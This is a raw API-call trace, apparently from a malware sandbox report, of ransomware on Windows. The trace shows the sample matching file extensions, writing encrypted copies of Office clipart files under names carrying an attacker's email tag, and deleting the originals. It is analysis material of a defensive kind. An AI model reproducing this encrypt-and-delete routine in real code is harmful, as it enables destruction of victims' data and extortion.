lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.882] lstrlenW (lpString=".bz2") returned 4 [0053.882] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.882] lstrlenW (lpString=".7z") returned 3 [0053.882] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.882] lstrlenW (lpString=".dbf") returned 4 [0053.882] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.882] lstrlenW (lpString=".1cd") returned 4 [0053.883] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.883] lstrlenW (lpString=".jpg") returned 4 [0053.883] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0054.090] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.090] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.090] GetLastError () returned 0x0 [0054.090] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x19e8, lpOverlapped=0x0) returned 1 [0054.111] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x19f0, lpOverlapped=0x0) returned 1 [0054.112] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0054.112] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.112] SetEndOfFile (hFile=0x224) returned 1 [0054.528] CloseHandle (hObject=0x224) returned 1 [0054.531] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.531] SetEndOfFile (hFile=0x1b8) returned 1 [0054.532] CloseHandle (hObject=0x1b8) returned 1 [0054.532] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.532] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf")) returned 1 [0054.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0054.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0054.532] lstrlenW (lpString=".doc") returned 4 [0054.533] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.533] lstrlenW (lpString=".docx") returned 5 [0054.533] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.533] lstrlenW (lpString=".pdf") returned 4 [0054.533] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.533] lstrlenW (lpString=".xls") returned 4 [0054.533] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.533] lstrlenW (lpString=".xlsx") returned 5 [0054.533] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.533] lstrlenW (lpString=".ppt") returned 4 [0054.533] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0054.533] lstrlenW (lpString=".zip") returned 4 [0054.533] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.533] lstrlenW (lpString=".rar") returned 4 [0054.533] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.533] lstrlenW (lpString=".bz2") returned 4 [0054.533] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.533] lstrlenW (lpString=".7z") returned 3 [0054.533] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0054.533] lstrlenW (lpString=".dbf") returned 4 [0054.533] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0054.533] lstrlenW (lpString=".1cd") returned 4 [0054.533] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0054.535] lstrlenW (lpString=".jpg") returned 4 [0054.535] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.536] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.536] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.536] GetLastError () returned 0x0 [0054.536] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x1384, lpOverlapped=0x0) returned 1 [0054.538] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1390, lpOverlapped=0x0) returned 1 [0054.538] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0054.539] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.539] SetEndOfFile (hFile=0x224) returned 1 [0054.539] CloseHandle (hObject=0x224) returned 1 [0054.539] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.539] SetEndOfFile (hFile=0x1b8) returned 1 [0054.540] CloseHandle (hObject=0x1b8) returned 1 [0054.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.540] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf")) returned 1 [0054.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0054.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0054.540] lstrlenW (lpString=".doc") returned 4 [0054.540] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.540] lstrlenW (lpString=".docx") returned 5 [0054.540] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.540] lstrlenW (lpString=".pdf") returned 4 [0054.540] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.540] lstrlenW (lpString=".xls") returned 4 [0054.540] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.540] lstrlenW (lpString=".xlsx") returned 5 [0054.540] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.540] lstrlenW (lpString=".ppt") returned 4 [0054.541] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0054.541] lstrlenW (lpString=".zip") returned 4 [0054.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.541] lstrlenW (lpString=".rar") returned 4 [0054.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.541] lstrlenW (lpString=".bz2") returned 4 [0054.541] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.541] lstrlenW (lpString=".7z") returned 3 [0054.541] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0054.541] lstrlenW (lpString=".dbf") returned 4 [0054.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0054.541] lstrlenW (lpString=".1cd") returned 4 [0054.541] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0054.541] lstrlenW (lpString=".jpg") returned 4 [0054.541] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.541] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.541] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.542] GetLastError () returned 0x0 [0054.542] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x138c, lpOverlapped=0x0) returned 1 [0054.543] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1390, lpOverlapped=0x0) returned 1 [0054.544] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0054.544] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.544] SetEndOfFile (hFile=0x224) returned 1 [0054.544] CloseHandle (hObject=0x224) returned 1 [0054.544] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.544] SetEndOfFile (hFile=0x1b8) returned 1 [0054.545] CloseHandle (hObject=0x1b8) returned 1 [0054.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.545] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf")) returned 1 [0054.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0054.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0054.546] lstrlenW (lpString=".doc") returned 4 [0054.546] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.546] lstrlenW (lpString=".docx") returned 5 [0054.546] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.546] lstrlenW (lpString=".pdf") returned 4 [0054.546] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.546] lstrlenW (lpString=".xls") returned 4 [0054.546] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.546] lstrlenW (lpString=".xlsx") returned 5 [0054.546] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.546] lstrlenW (lpString=".ppt") returned 4 [0054.546] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0054.546] lstrlenW (lpString=".zip") returned 4 [0054.546] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.546] lstrlenW (lpString=".rar") returned 4 [0054.546] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.546] lstrlenW (lpString=".bz2") returned 4 [0054.546] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.546] lstrlenW (lpString=".7z") returned 3 [0054.546] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0054.546] lstrlenW (lpString=".dbf") returned 4 [0054.546] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0054.546] lstrlenW (lpString=".1cd") returned 4 [0054.546] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0054.547] lstrlenW (lpString=".jpg") returned 4 [0054.547] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.547] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.547] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.549] GetLastError () returned 0x0 [0054.549] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x1306, lpOverlapped=0x0) returned 1 [0054.550] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1310, lpOverlapped=0x0) returned 1 [0054.552] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0054.552] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.552] SetEndOfFile (hFile=0x224) returned 1 [0054.552] CloseHandle (hObject=0x224) returned 1 [0054.552] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.552] SetEndOfFile (hFile=0x1b8) returned 1 [0054.553] CloseHandle (hObject=0x1b8) returned 1 [0054.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf")) returned 1 [0054.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0054.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0054.554] lstrlenW (lpString=".doc") returned 4 [0054.554] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.554] lstrlenW (lpString=".docx") returned 5 [0054.554] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.554] lstrlenW (lpString=".pdf") returned 4 [0054.554] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.554] lstrlenW (lpString=".xls") returned 4 [0054.554] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.554] lstrlenW (lpString=".xlsx") returned 5 [0054.554] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.554] lstrlenW (lpString=".ppt") returned 4 [0054.554] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0054.554] lstrlenW (lpString=".zip") returned 4 [0054.554] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.554] lstrlenW (lpString=".rar") returned 4 [0054.554] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.554] lstrlenW (lpString=".bz2") returned 4 [0054.554] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.554] lstrlenW (lpString=".7z") returned 3 [0054.554] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0054.554] lstrlenW (lpString=".dbf") returned 4 [0054.554] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0054.554] lstrlenW (lpString=".1cd") returned 4 [0054.555] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0054.555] lstrlenW (lpString=".jpg") returned 4 [0054.555] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.555] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.555] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.555] GetLastError () returned 0x0 [0054.555] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x6906, lpOverlapped=0x0) returned 1 [0054.557] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x6910, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x6910, lpOverlapped=0x0) returned 1 [0054.559] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0054.559] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.559] SetEndOfFile (hFile=0x224) returned 1 [0054.559] CloseHandle (hObject=0x224) returned 1 [0054.560] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.560] SetEndOfFile (hFile=0x1b8) returned 1 [0054.560] CloseHandle (hObject=0x1b8) returned 1 [0054.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf")) returned 1 [0054.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0054.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0054.561] lstrlenW (lpString=".doc") returned 4 [0054.561] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.561] lstrlenW (lpString=".docx") returned 5 [0054.561] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.561] lstrlenW (lpString=".pdf") returned 4 [0054.561] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.561] lstrlenW (lpString=".xls") returned 4 [0054.561] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.561] lstrlenW (lpString=".xlsx") returned 5 [0054.561] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.561] lstrlenW (lpString=".ppt") returned 4 [0054.561] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0054.561] lstrlenW (lpString=".zip") returned 4 [0054.561] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.561] lstrlenW (lpString=".rar") returned 4 [0054.561] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.561] lstrlenW (lpString=".bz2") returned 4 [0054.561] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.562] lstrlenW (lpString=".7z") returned 3 [0054.562] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0054.562] lstrlenW (lpString=".dbf") returned 4 [0054.562] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0054.562] lstrlenW (lpString=".1cd") returned 4 [0054.562] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0054.562] lstrlenW (lpString=".jpg") returned 4 [0054.562] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.562] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.562] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0054.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.563] GetLastError () returned 0x0 [0054.563] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x7114, lpOverlapped=0x0) returned 1 [0054.755] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x7120, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x7120, lpOverlapped=0x0) returned 1 